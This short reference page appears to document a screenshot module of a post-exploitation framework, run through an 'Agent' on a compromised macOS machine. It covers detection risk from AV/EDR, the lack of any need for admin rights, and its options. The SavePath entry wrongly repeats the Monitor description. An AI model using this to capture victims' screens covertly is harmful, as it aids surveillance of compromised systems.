The native_screenshot_mss module takes a screenshot of an OSX desktop using the Python mss module. The python-mss module utilizes ctypes and the CoreFoundation library.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the native_screenshot_mss module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

This is a list of options that are required by the native_screenshot_mss module:

Agent
Agent to execute module on.

Monitor
Monitor to obtain a screenshot. -1 represents all.
Default value: -1.

SavePath
Monitor to obtain a screenshot. 0 represents all.
Default value: /tmp/debug.png.
